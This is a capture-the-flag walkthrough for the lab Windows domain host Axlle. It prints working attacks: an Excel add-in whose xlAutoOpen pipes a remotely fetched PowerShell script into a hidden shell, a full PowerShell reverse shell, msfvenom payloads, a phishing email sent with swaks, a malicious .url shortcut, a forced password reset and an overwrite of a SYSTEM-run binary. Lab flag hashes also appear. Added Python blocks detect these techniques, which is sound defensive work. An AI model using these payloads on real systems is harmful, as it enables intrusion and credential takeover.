TCP Scan

> TARGET=10.129.77.43 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT      STATE SERVICE       REASON          VERSION
25/tcp    open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: FAF2C069F86E802FD21BF15DC8EDD2DC
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Axlle Development
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-22 22:16:25Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=MAINFRAME.axlle.htb
| Issuer: commonName=MAINFRAME.axlle.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-19T11:25:03
| Not valid after:  2024-11-18T11:25:03
| MD5:   acc1:ec10:1311:0c34:c548:bd34:8cce:53f9
| SHA-1: 9d6c:ac58:e52c:a711:9ffa:795f:171b:555c:cf0e:7fc9
|_ssl-date: 2024-06-22T22:17:58+00:00; +3s from scanner time.
| rdp-ntlm-info:
|   Target_Name: AXLLE
|   NetBIOS_Domain_Name: AXLLE
|   NetBIOS_Computer_Name: MAINFRAME
|   DNS_Domain_Name: axlle.htb
|   DNS_Computer_Name: MAINFRAME.axlle.htb
|   DNS_Tree_Name: axlle.htb
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-22T22:17:18+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56192/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56208/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56557/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56558/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57078/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows
  • add entry
echo '10.129.77.43    axlle.htb  MAINFRAME.axlle.htb' >> /etc/hosts

smtp

> nmap --script smtp-commands.nse --script-args smtp-commands.domain=axlle.htb -pT:25,465,587 axlle.htb
PORT    STATE    SERVICE
25/tcp  open     smtp
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
465/tcp filtered smtps
587/tcp filtered submission

enum

Our website is currently down for maintenance.
We apologise for the inconvenience and appreciate your patience as we work to improve our online presence.
If you have any outstanding invoices or requests, please email them to accounts@axlle.htb in Excel format. Please note that all macros are disabled due to our security posture.
We will be back as soon as possible. Thank you for your understanding.

foothold

download visual studio code
* need to install windows sdk
install excel 2013 sdk
get https://github.com/edparcell/HelloWorldXll
* switch to a release build
* setup project to use latest vs and windows sdk
* setup include path, library path
* update code in HelloWorldXll.cpp
* build
  • HelloWorldXll.cpp
#include "stdafx.h"

// Excel calls xlAutoOpen when the add-in is loaded, so the payload runs on open
short __stdcall xlAutoOpen()
{
	system("curl http://10.10.14.47/shell.ps1 | powershell -nop -W hidden -noni -ep bypass -f  -");
	return 1;
}
  • reverse shell
$client = New-Object System.Net.Sockets.TCPClient("ip",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  • trigger the exploit
> swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: test" --body "check" --attach @test.xll --server axlle.htb --port 25
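The mail-gateway check a defender would want against the delivery above, as an added example that is not part of the original writeup: it parses a MIME message, decodes each attachment and flags Excel add-ins by extension, PE magic and the xlAutoOpen export name. The sample message is constructed here, shaped like the swaks command.

```python
"""Mail-gateway check for Excel add-in (.xll) attachments.

Added example, not part of the original writeup. It models the control a
defender would want against the swaks delivery above: parse the MIME message,
decode each attachment and flag Excel add-ins by extension, by the PE 'MZ'
magic and by the xlAutoOpen export name, the entry point Excel calls when an
add-in loads. The sample message is constructed here.
"""
import email
from email import policy
from email.message import EmailMessage

XLL_ENTRY = b"xlAutoOpen"

def classify_attachment(filename: str, data: bytes) -> list[str]:
    """Return the reasons an attachment looks like an Excel add-in (empty if none)."""
    reasons = []
    if filename.lower().endswith(".xll"):
        reasons.append("xll extension")
    if data[:2] == b"MZ":                 # PE/DLL image, which is what an .xll is
        reasons.append("PE header")
    if XLL_ENTRY in data:                 # export name appears as an ASCII string
        reasons.append("xlAutoOpen export name")
    return reasons

def scan_message(raw: bytes) -> list[tuple[str, list[str]]]:
    """Parse a raw RFC 5322 message; return (filename, reasons) for flagged parts."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        reasons = classify_attachment(name, payload)
        if reasons:
            findings.append((name, reasons))
    return findings

def build_sample() -> bytes:
    """Constructed message shaped like the swaks delivery above; the .xll bytes are fake."""
    msg = EmailMessage()
    msg["From"] = "it@axlle.htb"
    msg["To"] = "accounts@axlle.htb"
    msg["Subject"] = "test"
    msg.set_content("check")
    fake_xll = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 32 + b"xlAutoOpen\x00"
    msg.add_attachment(fake_xll, maintype="application",
                       subtype="octet-stream", filename="test.xll")
    return bytes(msg)
```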

user: dallon.matrix

  • in C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F
> type "{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml"
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
 by MAINFRAME with ESMTP
 ; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/

Hi everyone,

The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.

We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.

Yours in click-worthy URLs,

The Web Dev Team
  • generate reverse shell and setup smbserver
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.47 LPORT=5555 -f exe > reverse.exe
> impacket-smbserver -smb2support share $(pwd)
  • trigger reverse shell
$url = "file:////10.10.14.47/share/reverse.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
  • setup meterpreter
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 10.10.14.47
set lport 5555
set ExitOnSession false
exploit -j
-----


C:\>whoami
axlle\dallon.matrix

C:\Users>cd dallon.matrix
C:\Users\dallon.matrix>cd desktop
C:\Users\dallon.matrix\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is BFF7-F940

 Directory of C:\Users\dallon.matrix\Desktop

01/01/2024  04:45 AM    <DIR>          .
01/01/2024  04:44 AM    <DIR>          ..
06/22/2024  12:02 PM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,854,342,656 bytes free

C:\Users\dallon.matrix\Desktop>type user.txt
80ec56555fe60dd5ca74ca268e68223b
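An audit for the shortcut trick above, as an added example that is not part of the original writeup: it parses the [InternetShortcut] section of a .url file and flags a URL= value that resolves to a share on another host, which is what the file:////10.10.14.47/share/reverse.exe shortcut does. The sample shortcut texts are constructed, modelled on the page's own.

```python
"""Audit Internet Shortcut (.url) files whose URL points at a remote share.

Added example, not part of the original writeup. The shortcut dropped into
C:\\inetpub\\testing above carries "URL=file:////10.10.14.47/share/reverse.exe",
so the automation that opens it reaches out to a share on another host. This
check flags URL= values naming a remote host (UNC path, file://host/... or
file:////host/...). Sample shortcut contents are constructed from the page.
"""
import configparser

def parse_url_file(text: str) -> dict[str, str]:
    """Return the [InternetShortcut] keys (configparser lower-cases them) or {}."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))

def is_remote_share(url: str) -> bool:
    """True when the URL names a host other than the local machine."""
    url = url.strip()
    if url.startswith("\\\\"):                      # UNC: \\host\share\...
        host = url[2:].split("\\", 1)[0]
    elif url.lower().startswith("file:"):
        rest = url[5:]
        slashes = len(rest) - len(rest.lstrip("/"))
        if slashes not in (2, 4):                  # file:///C:/... is a local path
            return False
        host = rest.lstrip("/").split("/", 1)[0]   # file://host/.. or file:////host/..
    else:
        return False
    return bool(host) and host.lower() not in {"localhost", "127.0.0.1", "::1"}

def audit_shortcut(text: str) -> tuple[bool, str]:
    """Return (flagged, url) for one .url file's contents."""
    url = parse_url_file(text).get("url", "")
    return is_remote_share(url), url

# Constructed samples: the page's shortcut and a harmless local one
SAMPLE_REMOTE = "[InternetShortcut]\r\nURL=file:////10.10.14.47/share/reverse.exe\r\n"
SAMPLE_LOCAL = "[InternetShortcut]\r\nURL=file:///C:/inetpub/wwwroot/index.html\r\n"
```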

root

  • check
PS C:\Users\Public\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
  • run SharpHound; the Web Devs group has ForceChangePassword rights on jacob.greeny
sh.exe -c All --zipfilename output.zip
Invoke-WebRequest -URI http://10.10.14.47/PowerView.ps1 -OutFile PowerView.ps1
import-module .\PowerView.ps1
  • Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass

> evil-winrm -i axlle.htb -u Jacob.Greeny -p SuperSecuredPassword123!
  • enum as jacob.greeny, who belongs to App Devs and can PSRemote to the target
C:\>net groups "App Devs"
Group name     App Devs
Comment        Application Developers

Members

-------------------------------------------------------------------------------
baz.humphries            jacob.greeny
The command completed successfully.
  • there is an automated process
C:\app development\kbfiltr> type README.md
...

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
  • C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64\standalonerunner.exe can be overwritten by App Devs
> ICACLS "C:\*." /T /C 2>$null | findstr "App Devs"
> icacls "C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64\standalonerunner.exe"
C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64\standalonerunner.exe
        AXLLE\App Devs:(I)(RX,W)
        Everyone:(I)(R)
        AXLLE\Administrator:(I)(F)
        BUILTIN\Users:(I)(R)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)
        APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
        APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
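The check an audit would run over icacls output like the above, as an added example that is not part of the original writeup: it parses the path-then-indented-ACE layout shown on the page and reports write rights held by principals other than SYSTEM, Administrators and TrustedInstaller, which is how the App Devs entry on standalonerunner.exe surfaces. The sample output is constructed from the page's lines.

```python
"""Flag files whose ACL lets a non-administrative principal write to them.

Added example, not from the original writeup. It parses icacls output in the
layout shown above (path line, then one indented ACE per line) and reports
rights such as W, M or F held by principals other than SYSTEM, Administrators
and TrustedInstaller. The sample below is constructed from the page's output.
"""
import re

ADMIN_NAMES = {"system", "administrators", "administrator", "trustedinstaller"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Simple and granular icacls rights that allow changing the file's contents or DACL
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}

def parse_icacls(output: str) -> dict[str, list[tuple[str, set[str]]]]:
    """Return {path: [(principal, rights)]}; inheritance flags are dropped."""
    acls, path = {}, None
    for line in output.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        if not line.startswith(" "):          # unindented line is the object path
            path = line.strip()
            acls[path] = []
            continue
        who, _, flags = line.strip().rpartition(":")
        tokens = [t for grp in re.findall(r"\(([^)]*)\)", flags) for t in grp.split(",")]
        acls[path].append((who, {t for t in tokens if t and t not in INHERIT_FLAGS}))
    return acls

def writable_by_untrusted(acls) -> list[tuple[str, str, set[str]]]:
    """Return (path, principal, write rights) for every ACE an audit should question."""
    findings = []
    for path, aces in acls.items():
        for who, rights in aces:
            account = who.rsplit("\\", 1)[-1].lower()   # strip the DOMAIN\ prefix
            if account not in ADMIN_NAMES and rights & WRITE_RIGHTS:
                findings.append((path, who, rights & WRITE_RIGHTS))
    return findings

SAMPLE_ICACLS = "\n".join([   # constructed from the icacls output on the page
    r"C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64\standalonerunner.exe",
    r"        AXLLE\App Devs:(I)(RX,W)",
    r"        Everyone:(I)(R)",
    r"        AXLLE\Administrator:(I)(F)",
    r"        BUILTIN\Users:(I)(R)",
    r"        NT AUTHORITY\SYSTEM:(I)(F)",
    r"        BUILTIN\Administrators:(I)(F)",
    r"        APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)",
    "Successfully processed 1 files; Failed processing 0 files",
])
```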
  • overwrite the existing standalonerunner.exe and keep overwriting it, since a process constantly restores it
> cd "C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64"
> wget http://10.10.14.47/reverse.exe -o standalonerunner.exe
  • set your meterpreter listener, wait for the admin to run standalonerunner.exe
PS C:\Users\Public\Documents> sessions 4

[*] Backgrounding session 2...
[*] Starting interaction with 4...

Shell Banner:
Microsoft Windows [Version 10.0.20348.2527]
-----

C:\>whoami
axlle\administrator

C:\>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
3c98a1e6f463f86ce7723b1ff396afce

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack